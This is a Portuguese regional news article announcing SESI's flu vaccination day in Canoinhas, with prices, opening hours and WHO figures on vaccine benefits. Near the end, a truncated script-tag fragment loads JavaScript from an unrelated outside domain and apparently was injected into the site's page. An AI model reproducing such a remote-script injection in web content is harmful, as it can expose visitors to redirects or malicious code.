InícioSaúdeDia V da Campanha de Vacinação da Gripe será dia 05 de...

Dia V da Campanha de Vacinação da Gripe será dia 05 de maio em Canoinhas

Últimas notícias

Penso, logo destino: Cerca de 886 pneus em desuso são recolhidos em Três Barras

O município de Três Barras realizou nesta quarta-feira, 24,...

Vítima de acidente para encima do teto do carro após colisão

Na tarde desta quarta-feira, 25, por volta das 16h30, ...

O SESI, entidade da FIESC, realiza sábado, dia 05 de maio, em Canoinhas o Dia V da Campanha de vacinação contra a gripe. O horário de atendimento será das 8h às 12h e das 13h às 16h.

 

 

A vacina está disponível no SESI, para toda a comunidade, no valor de R$ 50,00 a Trivalente e R$ 70,00 a Quadrivalente. Para colaboradores e dependentes da indústria os preços são diferenciados. Serão vacinadas somente pessoas com mais de 5 anos de idade. Horários de atendimentos:  quartas-feiras das 16h às 20h e nas sextas feiras das 13h30min às 17h.  Neste ano, a expectativa é imunizar cerca de 300 mil pessoas em todo o Estado. Na Regional Centro-Norte da FIESC a meta é imunizar cerca de 23 mil trabalhadores.

 

 

Mais informações: (49) 3621-6600

 

Gripe é uma doença séria

 

A Organização Mundial da Saúde (OMS) estima que mais de 2 milhões de mortes a cada ano sejam evitadas pela vacinação. O órgão também garante que a imunização é um dos investimentos em saúde que oferecem o melhor custo-efetividade para as nações, possibilitando resultado expressivo de prevenção a baixo custo, se comparadas a outras medidas.

 

 

Diferente de um resfriado, a gripe é uma doença séria. Todos deveriam, anualmente, tomar vacina contra a influenza, lembrando que quanto mais frágil a saúde do indivíduo, maior a importância de se vacinar. A imunização da população é muito importante para evitar os surtos de gripe.

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.